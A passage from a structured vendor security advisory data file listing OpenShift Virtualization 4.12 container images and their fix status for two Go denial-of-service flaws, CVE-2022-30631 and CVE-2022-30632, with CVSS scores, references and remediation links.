"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-30631", }, { category: "external", summary: "RHBZ#2107342", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107342", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-30631", url: "https://www.cve.org/CVERecord?id=CVE-2022-30631", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-30631", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-30631", }, { category: "external", summary: "https://go.dev/issue/53168", url: "https://go.dev/issue/53168", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", url: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", }, ], release_date: "2022-07-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: compress/gzip: stack exhaustion in Reader.Read", }, { cve: "CVE-2022-30632", cwe: { id: "CWE-1325", name: "Improperly Controlled Sequential Memory Allocation", }, discovery_date: "2022-07-14T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2107386", }, ], notes: [ { category: "description", text: "A flaw was found in golang. Calling Glob on a path that contains a large number of path separators can cause a panic issue due to stack exhaustion. This can cause an attacker to impact availability.", title: "Vulnerability description", }, { category: "summary", text: "golang: path/filepath: stack exhaustion in Glob", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-30632", }, { category: "external", summary: "RHBZ#2107386", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-30632", url: "https://www.cve.org/CVERecord?id=CVE-2022-30632", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-30632", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-30632", }, { category: "external", summary: "https://go.dev/issue/53416", url: "https://go.dev/issue/53416", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", url: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", }, ], release_date: "2022-07-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { 